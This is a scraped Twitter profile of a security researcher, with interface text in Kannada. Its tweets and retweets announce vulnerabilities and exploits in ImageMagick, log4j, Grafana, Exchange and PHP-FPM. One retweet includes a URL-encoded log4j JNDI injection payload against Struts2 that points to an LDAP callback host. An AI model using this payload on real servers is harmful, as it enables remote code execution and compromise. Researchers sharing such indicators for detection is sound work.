Nguyen The Duc

@ducnt_

Just another web warrior ⚔️ Security Researcher | Lead Security Engineer | CTF player && | squad |💰 | nano 💻

Inside The PHP Storm
ducnt.net
ಫೆಬ್ರವರಿ 2017 ಸಮಯದಲ್ಲಿ ಸೇರಿದ್ದಾರೆ
41 ಫೋಟೋಗಳು ಅಥವಾ ವೀಡಿಯೋಗಳು ಫೋಟೋಗಳು ಮತ್ತು ವೀಡಿಯೋಗಳು

ಟ್ವೀಟ್‌ಗಳು

ನೀವು @ducnt_ ಅವರನ್ನು ತಡೆಹಿಡಿದಿರುವಿರಿ

ಈ ಟ್ವೀಟ್‌ಗಳನ್ನು ವೀಕ್ಷಿಸಲು ನೀವು ಖಚಿತವಾಗಿ ಬಯಸುವಿರಾ? ಟ್ವೀಟ್ ವೀಕ್ಷಣೆಯು @ducnt_ ಅವರ ತಡೆತೆರವುಗೊಳಿಸುವುದಿಲ್ಲ

  1. ಪಿನ್ ಮಾಡಿದ ಟ್ವೀಟ್
    ಸೆಪ್ಟೆಂ 5

    So, here is another gift for you about Imagemagick RCE 0-day that afftceted to GhostScript-9.50 😀

    13 replies 354 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 860ಇಷ್ಟಗಳು
    ಈ ಥ್ರೆಡ್ ತೋರಿಸಿ
    ಈ ಥ್ರೆಡ್ ತೋರಿಸಿ
    ರದ್ದುಗೊಳಿಸು
  2. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    15 ಗಂಟೆಗಳ ಹಿಂದೆ

    Got the root shell and escaped from the container on Google's Container-Optimized OS. Used a 1-day, but indeed a 0-day in many vendors' kernel. I will release the code if possible, it might be the first public exploit applying corss-cache technique in Linux kernel.

    4 replies 111 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 456ಇಷ್ಟಗಳು
    ಈ ಥ್ರೆಡ್ ತೋರಿಸಿ
    ಈ ಥ್ರೆಡ್ ತೋರಿಸಿ
    ರದ್ದುಗೊಳಿಸು
  3. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ಡಿಸೆಂ 11

    Struts2 RCE PoC/IoC: /$%7bjndi:ldap:/$%7blower:/%7d192.168.139.1:1389/o=tomcat%7d$%7blower:/%7d/ Disclaimer: This isn't an 0day, It has already been mentioned as vulnerable in many Chinese blog post *this really reminds me of SpEL injection

    3 replies 149 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 479ಇಷ್ಟಗಳು
    ರದ್ದುಗೊಳಿಸು
  4. ಡಿಸೆಂ 11

    Awesome WAF, check it out 🙌

    Polaris rolled out protection for our customers using our Web Application & API Protection against log4j2 vulnerability (CVE-2021-44228). We have refined the rules to block more advanced WAF bypass payloads.
    1 ಇಷ್ಟ
    ರದ್ದುಗೊಳಿಸು
  5. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ಡಿಸೆಂ 10

    The log4j2 JNDI injection RCE we found must be epic!

    17 replies 79 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 738ಇಷ್ಟಗಳು
    ರದ್ದುಗೊಳಿಸು
  6. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ಡಿಸೆಂ 8

    14,744 replies 65,919 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 605,988ಇಷ್ಟಗಳು
    ರದ್ದುಗೊಳಿಸು
  7. ಡಿಸೆಂ 7

    Just got worked 0day exploit PoC for Arbitrary File Read of Grafana with my awesome collab again 👀

    2 replies 17 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 139ಇಷ್ಟಗಳು
    ರದ್ದುಗೊಳಿಸು
  8. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ಡಿಸೆಂ 1

    This shouldn't have happened: A vulnerability postmortem

    10 replies 271 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 703ಇಷ್ಟಗಳು
    ರದ್ದುಗೊಳಿಸು
  9. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ನವೆಂ 29

    Can somebody explain to me how to read this C code? For example what does `&style->fontsize` mean? HAHAHHAHHA

    18 replies 80 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 518ಇಷ್ಟಗಳು
    ಈ ಥ್ರೆಡ್ ತೋರಿಸಿ
    ಈ ಥ್ರೆಡ್ ತೋರಿಸಿ
    ರದ್ದುಗೊಳಿಸು
  10. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ನವೆಂ 4

    The arcade dragon's lair

    A girl with two buns in her hair stands in front of an arcade prize counter. A black dragon, lit with purple, is curled up on top of the prize counter on top of a massive pile of arcade toys.
    295 replies 22,870 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 113,939ಇಷ್ಟಗಳು
    ಈ ಥ್ರೆಡ್ ತೋರಿಸಿ
    ಈ ಥ್ರೆಡ್ ತೋರಿಸಿ
    ರದ್ದುಗೊಳಿಸು
  11. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ನವೆಂ 22

    Please no

    7 replies 33 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 344ಇಷ್ಟಗಳು
    ರದ್ದುಗೊಳಿಸು
  12. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ನವೆಂ 22

    Windows installer LPE 0day

    15 replies 471 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 1,080ಇಷ್ಟಗಳು
    ರದ್ದುಗೊಳಿಸು
  13. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ನವೆಂ 19

    Just published detailed analysis of Microsoft Exchange Deserialization to RCE (CVE-2021-42321), which's also found exploited in Tianfu Cup. English version from PoC is not provided, Have fun!

    6 replies 182 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 421ಇಷ್ಟಗಳು
    ಈ ಥ್ರೆಡ್ ತೋರಿಸಿ
    ಈ ಥ್ರೆಡ್ ತೋರಿಸಿ
    ರದ್ದುಗೊಳಿಸು
  14. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ನವೆಂ 15

    🤣🤣🤣 Oh hell no!

    15 replies 56 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 354ಇಷ್ಟಗಳು
    ರದ್ದುಗೊಳಿಸು
  15. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ನವೆಂ 15

    http://p-ntagram-deactivated20160828.tumblr.com/post/138540744094
    110 replies 4,340 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 34,038ಇಷ್ಟಗಳು
    ರದ್ದುಗೊಳಿಸು
  16. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ನವೆಂ 16

    Nice work done by He will be adding new features to it soon. Hopefully it will be useful to someone out there.

    This is a demo of a tool made by our Team mate, Peter Nguyen (), which is useful for decrypting Kernel Cache on iOS 12 and newer. It is working on mac M1 too.
    1 reply 3 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 19ಇಷ್ಟಗಳು
    ರದ್ದುಗೊಳಿಸು
  17. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ನವೆಂ 10

    Hey, great news, Google Chromium just started a war and I'm going to enjoy this one

    56 replies 372 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 1,089ಇಷ್ಟಗಳು
    ಈ ಥ್ರೆಡ್ ತೋರಿಸಿ
    ಈ ಥ್ರೆಡ್ ತೋರಿಸಿ
    ರದ್ದುಗೊಳಿಸು
  18. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ನವೆಂ 7

    9 replies 66 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 354ಇಷ್ಟಗಳು
    ರದ್ದುಗೊಳಿಸು
  19. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ಅಕ್ಟೋ 27

    My first macOS LPE

    4 replies 4 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 145ಇಷ್ಟಗಳು
    ರದ್ದುಗೊಳಿಸು
  20. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ಅಕ್ಟೋ 25

    Read the details about -2021-21703 on our Ambionics' blog, a 10 year-old Local Root vulnerability affecting PHP-FPM, FastCGI's server. PHP-FPM is often used with major HTTPd servers such as and .

    3 replies 114 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 268ಇಷ್ಟಗಳು
    ರದ್ದುಗೊಳಿಸು
  21. ಅವರು ಮರುಟ್ವೀಟಿಸಿದ್ದಾರೆ
    ಅಕ್ಟೋ 20

    It’s never too late to review path normalizations and break parser logics!

    after Apache HTTPd Path Traversal (CVE-2021-42013/41773) I review the CVE-2018-19052 Lighttpd path traversal (credit )
    55 ಮರುಟ್ವೀಟಿಸುವಿಕೆಗಳು 313ಇಷ್ಟಗಳು
    ರದ್ದುಗೊಳಿಸು

@ducnt_ ಅವರು ಇನ್ನೂ ಟ್ವೀಟ್ ಮಾಡಿಲ್ಲ.

ಲೋಡಿಂಗ್ ಸಮಯ ಸ್ವಲ್ಪ ತೆಗೆದುಕೊಳ್ಳುತ್ತಿರುವಂತೆನಿಸುತ್ತದೆ.

Twitter ಸಾಮರ್ಥ್ಯ ಮೀರಿರಬಹುದು ಅಥವಾ ಕ್ಷಣಿಕವಾದ ತೊಂದರೆಯನ್ನು ಅನುಭವಿಸುತ್ತಿರಬಹುದು. ಮತ್ತೆ ಪ್ರಯತ್ನಿಸಿ ಅಥವಾ ಹೆಚ್ಚಿನ ಮಾಹಿತಿಗೆ Twitter ಸ್ಥಿತಿಗೆ ಭೇಟಿ ನೀಡಿ.

    ಇದನ್ನೂ ಸಹ ನೀವು ಇಷ್ಟಪಡಬಹುದು

    ·